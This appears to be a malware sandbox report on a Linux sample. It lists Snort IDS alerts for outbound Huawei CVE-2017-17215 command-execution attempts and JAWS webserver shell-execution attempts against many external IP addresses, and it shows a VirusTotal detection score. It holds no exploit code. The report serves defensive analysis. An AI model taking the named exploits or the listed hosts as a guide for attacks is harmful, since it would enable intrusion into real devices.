      Timestamp:192.168.2.23156.250.20.10550980372152835222 07/19/22-13:07:33.593341
      SID:2835222
      Source Port:50980
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2370.166.193.19542020802030092 07/19/22-13:07:45.970532
      SID:2030092
      Source Port:42020
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.146.4148512372152835222 07/19/22-13:08:40.941172
      SID:2835222
      Source Port:48512
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.226.96.13845370372152835222 07/19/22-13:08:02.457456
      SID:2835222
      Source Port:45370
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2393.115.143.7752936802030092 07/19/22-13:07:13.849568
      SID:2030092
      Source Port:52936
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.185.42.23652266802030092 07/19/22-13:08:02.164539
      SID:2030092
      Source Port:52266
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.88.9540758372152835222 07/19/22-13:07:44.302283
      SID:2835222
      Source Port:40758
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.193.134.6158220802030092 07/19/22-13:08:56.555062
      SID:2030092
      Source Port:58220
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.175.78.735196802030092 07/19/22-13:07:25.240558
      SID:2030092
      Source Port:35196
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.179.109.19744858802030092 07/19/22-13:07:50.981149
      SID:2030092
      Source Port:44858
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.245.61.15456196372152835222 07/19/22-13:08:10.247333
      SID:2835222
      Source Port:56196
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.241.13.14343604372152835222 07/19/22-13:08:24.116886
      SID:2835222
      Source Port:43604
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2352.41.188.18751512802030092 07/19/22-13:08:28.992899
      SID:2030092
      Source Port:51512
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.252.172.5336916802030092 07/19/22-13:07:00.367540
      SID:2030092
      Source Port:36916
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.147.75.5960866802030092 07/19/22-13:08:23.501968
      SID:2030092
      Source Port:60866
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.188.174.25448690802030092 07/19/22-13:07:59.768625
      SID:2030092
      Source Port:48690
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.89.151.14654838802030092 07/19/22-13:08:17.622775
      SID:2030092
      Source Port:54838
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.105.154.4257620802030092 07/19/22-13:07:00.555167
      SID:2030092
      Source Port:57620
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.21.9.21157622802030092 07/19/22-13:08:37.249180
      SID:2030092
      Source Port:57622
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.13.112.19836184802030092 07/19/22-13:08:23.625461
      SID:2030092
      Source Port:36184
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.196.20144100802030092 07/19/22-13:08:48.883282
      SID:2030092
      Source Port:44100
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.125.39.8536406802030092 07/19/22-13:08:32.174136
      SID:2030092
      Source Port:36406
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.95.176.3937378802030092 07/19/22-13:07:47.364953
      SID:2030092
      Source Port:37378
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.57.228.21559030802030092 07/19/22-13:07:30.739077
      SID:2030092
      Source Port:59030
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.84.40.12059744802030092 07/19/22-13:08:23.470131
      SID:2030092
      Source Port:59744
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2363.41.132.16460828802030092 07/19/22-13:08:49.017007
      SID:2030092
      Source Port:60828
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.238.52.20135326372152835222 07/19/22-13:07:41.515959
      SID:2835222
      Source Port:35326
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2380.41.68.20243354802030092 07/19/22-13:07:39.014555
      SID:2030092
      Source Port:43354
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.100.8354378372152835222 07/19/22-13:08:35.815339
      SID:2835222
      Source Port:54378
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.250.123.11459908372152835222 07/19/22-13:08:31.623957
      SID:2835222
      Source Port:59908
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2313.226.97.15055970802030092 07/19/22-13:07:42.717765
      SID:2030092
      Source Port:55970
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.218.177.24151636802030092 07/19/22-13:07:25.429195
      SID:2030092
      Source Port:51636
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.179.42.6339354802030092 07/19/22-13:08:08.536766
      SID:2030092
      Source Port:39354
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2362.93.4.3357528802030092 07/19/22-13:08:59.700744
      SID:2030092
      Source Port:57528
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.5.20.19139578802030092 07/19/22-13:07:00.425756
      SID:2030092
      Source Port:39578
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.11.5737424372152835222 07/19/22-13:08:24.106000
      SID:2835222
      Source Port:37424
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2351.104.181.17354760802030092 07/19/22-13:08:37.332819
      SID:2030092
      Source Port:54760
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23129.219.99.15132770802030092 07/19/22-13:08:54.053880
      SID:2030092
      Source Port:32770
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2331.133.86.4956796802030092 07/19/22-13:08:45.628723
      SID:2030092
      Source Port:56796
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.83.7547706372152835222 07/19/22-13:08:24.123815
      SID:2835222
      Source Port:47706
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2354.70.46.14754662802030092 07/19/22-13:08:45.770093
      SID:2030092
      Source Port:54662
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.48.14.20458472802030092 07/19/22-13:07:00.404353
      SID:2030092
      Source Port:58472
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.74.238.5337440802030092 07/19/22-13:07:30.448141
      SID:2030092
      Source Port:37440
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.76.130.25234680802030092 07/19/22-13:08:06.138891
      SID:2030092
      Source Port:34680
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23209.236.239.17756568802030092 07/19/22-13:08:59.799760
      SID:2030092
      Source Port:56568
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2379.175.164.1354888802030092 07/19/22-13:07:55.681075
      SID:2030092
      Source Port:54888
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.65.187.1752160802030092 07/19/22-13:08:41.635682
      SID:2030092
      Source Port:52160
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23216.172.146.20847906802030092 07/19/22-13:07:47.858666
      SID:2030092
      Source Port:47906
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.87.124.15544938802030092 07/19/22-13:08:13.770469
      SID:2030092
      Source Port:44938
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.92.17738034372152835222 07/19/22-13:08:16.875182
      SID:2835222
      Source Port:38034
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2352.37.94.9835484802030092 07/19/22-13:07:52.902664
      SID:2030092
      Source Port:35484
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.163.10851858802030092 07/19/22-13:08:10.152906
      SID:2030092
      Source Port:51858
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.118.22142572372152835222 07/19/22-13:08:47.429999
      SID:2835222
      Source Port:42572
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2377.68.75.9958850802030092 07/19/22-13:08:04.547628
      SID:2030092
      Source Port:58850
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.128.25.16952300802030092 07/19/22-13:07:21.850133
      SID:2030092
      Source Port:52300
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.187.208.17135748802030092 07/19/22-13:08:12.923890
      SID:2030092
      Source Port:35748
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.21.212.18348008802030092 07/19/22-13:08:27.075864
      SID:2030092
      Source Port:48008
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.226.244.14956560802030092 07/19/22-13:07:21.789737
      SID:2030092
      Source Port:56560
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23203.45.224.19560946802030092 07/19/22-13:08:37.914311
      SID:2030092
      Source Port:60946
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.147.2.744868802030092 07/19/22-13:07:55.431877
      SID:2030092
      Source Port:44868
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.28.7334648372152835222 07/19/22-13:07:41.332294
      SID:2835222
      Source Port:34648
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23212.11.218.1560800802030092 07/19/22-13:07:55.726714
      SID:2030092
      Source Port:60800
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.241.9.6550430802030092 07/19/22-13:07:59.573557
      SID:2030092
      Source Port:50430
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.21.193.4648542802030092 07/19/22-13:08:17.649196
      SID:2030092
      Source Port:48542
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.212.106.22255196802030092 07/19/22-13:07:52.750585
      SID:2030092
      Source Port:55196
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.201.183.21735476802030092 07/19/22-13:08:31.671441
      SID:2030092
      Source Port:35476
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2390.65.228.20355434802030092 07/19/22-13:08:26.937482
      SID:2030092
      Source Port:55434
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23143.204.206.13642328802030092 07/19/22-13:07:58.294047
      SID:2030092
      Source Port:42328
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.226.91.10653460372152835222 07/19/22-13:08:34.314443
      SID:2835222
      Source Port:53460
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.235.108.851120372152835222 07/19/22-13:07:41.433048
      SID:2835222
      Source Port:51120
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.107.244.15833332802030092 07/19/22-13:08:20.551223
      SID:2030092
      Source Port:33332
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.192.51.22141904802030092 07/19/22-13:07:55.708252
      SID:2030092
      Source Port:41904
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.84.231.1937756802030092 07/19/22-13:08:34.814775
      SID:2030092
      Source Port:37756
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.230.49.9449734802030092 07/19/22-13:07:52.874677
      SID:2030092
      Source Port:49734
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.72.2152014372152835222 07/19/22-13:07:52.992932
      SID:2835222
      Source Port:52014
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23107.174.146.5649454802030092 07/19/22-13:07:18.552557
      SID:2030092
      Source Port:49454
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2314.168.208.758076802030092 07/19/22-13:07:33.667192
      SID:2030092
      Source Port:58076
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.117.4.7946370802030092 07/19/22-13:08:37.564886
      SID:2030092
      Source Port:46370
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.235.96.11154430372152835222 07/19/22-13:08:55.521463
      SID:2835222
      Source Port:54430
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.229.184.16855334802030092 07/19/22-13:08:41.709998
      SID:2030092
      Source Port:55334
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.182.76.16236730802030092 07/19/22-13:08:37.375732
      SID:2030092
      Source Port:36730
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.252.255.8346792802030092 07/19/22-13:08:20.531798
      SID:2030092
      Source Port:46792
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23160.124.63.24033748802030092 07/19/22-13:08:08.645844
      SID:2030092
      Source Port:33748
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2378.129.188.2640694802030092 07/19/22-13:07:08.550824
      SID:2030092
      Source Port:40694
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23189.237.62.24351100802030092 07/19/22-13:08:20.539915
      SID:2030092
      Source Port:51100
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2361.71.107.19255962802030092 07/19/22-13:08:09.078572
      SID:2030092
      Source Port:55962
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23177.185.63.9948538802030092 07/19/22-13:08:16.301503
      SID:2030092
      Source Port:48538
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2362.133.73.18443228802030092 07/19/22-13:08:56.591684
      SID:2030092
      Source Port:43228
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.86.12840618372152835222 07/19/22-13:08:16.804257
      SID:2835222
      Source Port:40618
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.238.46.23842282372152835222 07/19/22-13:07:54.053481
      SID:2835222
      Source Port:42282
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23118.219.148.24148884802030092 07/19/22-13:07:47.512338
      SID:2030092
      Source Port:48884
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.125.85.13042668802030092 07/19/22-13:07:00.453104
      SID:2030092
      Source Port:42668
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.66.38.24457736802030092 07/19/22-13:07:22.567641
      SID:2030092
      Source Port:57736
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2312.133.236.21435964802030092 07/19/22-13:08:03.641325
      SID:2030092
      Source Port:35964
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.85.116.23637692802030092 07/19/22-13:07:22.448122
      SID:2030092
      Source Port:37692
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23209.23.113.1344730802030092 07/19/22-13:07:44.062655
      SID:2030092
      Source Port:44730
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.26.60.8253916802030092 07/19/22-13:07:22.887927
      SID:2030092
      Source Port:53916
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.61.191.15159648802030092 07/19/22-13:07:48.117257
      SID:2030092
      Source Port:59648
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.229.92.13460384802030092 07/19/22-13:07:53.124849
      SID:2030092
      Source Port:60384
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.95.37.8552832802030092 07/19/22-13:07:43.855621
      SID:2030092
      Source Port:52832
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.211.0.24544952802030092 07/19/22-13:07:43.980951
      SID:2030092
      Source Port:44952
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.225.140.14945514372152835222 07/19/22-13:07:34.104468
      SID:2835222
      Source Port:45514
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.226.43.25559524372152835222 07/19/22-13:07:22.658082
      SID:2835222
      Source Port:59524
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.69.137.16160946802030092 07/19/22-13:07:25.154093
      SID:2030092
      Source Port:60946
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.194.17.9860724802030092 07/19/22-13:07:46.083805
      SID:2030092
      Source Port:60724
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23159.65.123.5648486802030092 07/19/22-13:07:16.235648
      SID:2030092
      Source Port:48486
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.71.187.22448640802030092 07/19/22-13:07:52.958023
      SID:2030092
      Source Port:48640
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.50.201.8755072802030092 07/19/22-13:07:31.970597
      SID:2030092
      Source Port:55072
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.11.18740990372152835222 07/19/22-13:08:54.395419
      SID:2835222
      Source Port:40990
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2318.67.56.6538818802030092 07/19/22-13:08:43.060701
      SID:2030092
      Source Port:38818
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.77.9444256372152835222 07/19/22-13:08:20.904827
      SID:2835222
      Source Port:44256
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.241.112.20251016372152835222 07/19/22-13:07:22.658317
      SID:2835222
      Source Port:51016
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: yRo17s2SbcVirustotal: Detection: 50%Perma Link

      Networking

      barindex
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45718 -> 156.241.106.49:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37302 -> 156.244.101.27:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47628 -> 52.59.69.81:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42600 -> 185.80.55.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41490 -> 5.189.163.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47986 -> 213.219.175.114:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44798 -> 156.226.120.229:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45472 -> 193.86.132.98:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36916 -> 162.252.172.53:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53414 -> 172.87.76.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58472 -> 23.48.14.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39578 -> 202.5.20.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34008 -> 17.253.5.33:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45704 -> 156.254.46.48:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52202 -> 108.225.11.234:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42668 -> 202.125.85.130:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57620 -> 20.105.154.42:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54718 -> 46.37.21.78:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58644 -> 184.50.140.101:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44036 -> 104.165.143.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56224 -> 45.39.175.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56268 -> 193.220.127.53:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56134 -> 107.151.105.178:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56606 -> 75.101.164.33:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41390 -> 23.65.67.244:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55444 -> 38.26.163.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47346 -> 180.70.9.68:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48414 -> 191.249.246.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43640 -> 195.123.127.169:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39646 -> 46.16.19.198:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48036 -> 178.32.165.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56710 -> 217.44.36.200:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47498 -> 138.201.55.42:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44296 -> 95.169.185.216:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40694 -> 78.129.188.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50230 -> 84.130.168.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44276 -> 45.15.66.34:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45246 -> 150.105.100.187:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39342 -> 114.33.162.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60228 -> 172.65.170.182:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50968 -> 173.223.66.176:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48492 -> 34.149.247.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52936 -> 93.115.143.77:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50312 -> 144.91.120.211:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50762 -> 150.220.146.170:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48486 -> 159.65.123.56:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38106 -> 35.241.58.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43568 -> 34.255.54.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53726 -> 64.59.72.18:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50750 -> 34.120.151.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45274 -> 52.39.202.71:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49454 -> 107.174.146.56:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33048 -> 213.168.70.46:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41138 -> 138.100.70.249:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60870 -> 52.3.26.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57056 -> 54.205.30.3:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36218 -> 198.15.222.119:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59316 -> 35.182.199.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41628 -> 209.197.111.109:80
